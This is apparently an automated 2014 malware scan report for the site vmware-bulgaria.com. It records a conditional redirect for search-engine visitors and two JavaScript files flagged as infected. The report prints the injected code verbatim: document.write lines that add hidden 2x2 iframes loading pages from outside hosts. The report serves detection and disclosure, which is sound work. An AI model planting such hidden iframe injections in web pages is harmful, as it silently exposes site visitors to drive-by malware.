Malicious/Suspicious Redirects
URL: http://vmware-bulgaria.com/ (imitation of visitor from search engine)
Status: malicious

Request:
GET / HTTP/1.1
Host: vmware-bulgaria.com
Referer: http://www.google.com/search?q=redirect+check1

Server response:
HTTP/1.1 302 Found
Cache-Control: max-age=600
Connection: close
Date: Tue, 16 Sep 2014 05:22:27 GMT
Location: http://mdg480.mdg480marketing.com/blog/?p=5510&comment=1340832
Server: Apache
Content-Length: 250
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 16 Sep 2014 05:32:27 GMT
Scanned pages/files
Request | Server response | Status |
http://vmware-bulgaria.com/ | 200 OK Content-Length: 9725 Content-Type: text/html | clean |
http://vmware-bulgaria.com/data.js | 200 OK Content-Length: 3229 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmi.html?j=1058599></iframe>');
curImage=1; var data=new Array("", "<img src='data/1.jpg'/>", "<img src='data/2.jpg'/>", "<img src='data/3.jpg'/>", "<img src='data/4.jpg'/>", "<img src='data/5.jpg'/>", "<img src='data/6.jpg'/>", "<img src='data/7.jpg'/&
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://sampaointl.com/mzai.html></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tuana-store.com/eozi.html?i=1058599></iframe>');
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmi.html?j=1058599 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmi.html?j=1058599>
Hidden iFrame found. The same iFrame was found in 24 websites. size: 2x2 src: http://sampaointl.com/mzai.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://sampaointl.com/mzai.html>
Hidden iFrame found. size: 2x2 src: http://moreclosings.com/showthread.php?sid=89273 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=89273>
Hidden iFrame found. size: 2x2 src: http://micasafoundation.org/showthread.php?sid=89273 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://micasafoundation.org/showthread.php?sid=89273>
Hidden iFrame found. size: 2x2 src: http://tuana-store.com/eozi.html?i=1058599 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tuana-store.com/eozi.html?i=1058599>
http://vmware-bulgaria.com/includes/swfobject.js | 200 OK Content-Length: 7689 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmi.html?j=1058599></iframe>');
if(typeof deconcept=="undefined"){var deconcept=new Object();}if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUtil=new Object();}deconcept.SWFObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a){if(!document.getElementById){return
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://sampaointl.com/mzai.html></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tuana-store.com/eozi.html?i=1058599></iframe>');
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://micasafoundation.org/showthread.php?sid=89273 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://micasafoundation.org/showthread.php?sid=89273>
Hidden iFrame found. size: 2x2 src: http://moreclosings.com/showthread.php?sid=89273 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=89273>
Hidden iFrame found. The same iFrame was found in 24 websites. size: 2x2 src: http://sampaointl.com/mzai.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://sampaointl.com/mzai.html>
Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmi.html?j=1058599 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmi.html?j=1058599>
Hidden iFrame found. size: 2x2 src: http://tuana-store.com/eozi.html?i=1058599 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tuana-store.com/eozi.html?i=1058599>
http://vmware-bulgaria.com/fullintro.flv | 200 OK Content-Length: 300120 Content-Type: text/plain | clean |
http://vmware-bulgaria.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://vmware-bulgaria.com/data/Press_Info-WMware_New_Office.pdf | 200 OK Content-Length: 165639 Content-Type: application/pdf | clean |
http://vmware-bulgaria.com/data/Press_Info-VMware_New_Sofia_Office.doc | 200 OK Content-Length: 48640 Content-Type: application/msword | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vmware-bulgaria.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vmware-bulgaria.com/
Result: vmware-bulgaria.com is not infected or malware details are not published yet.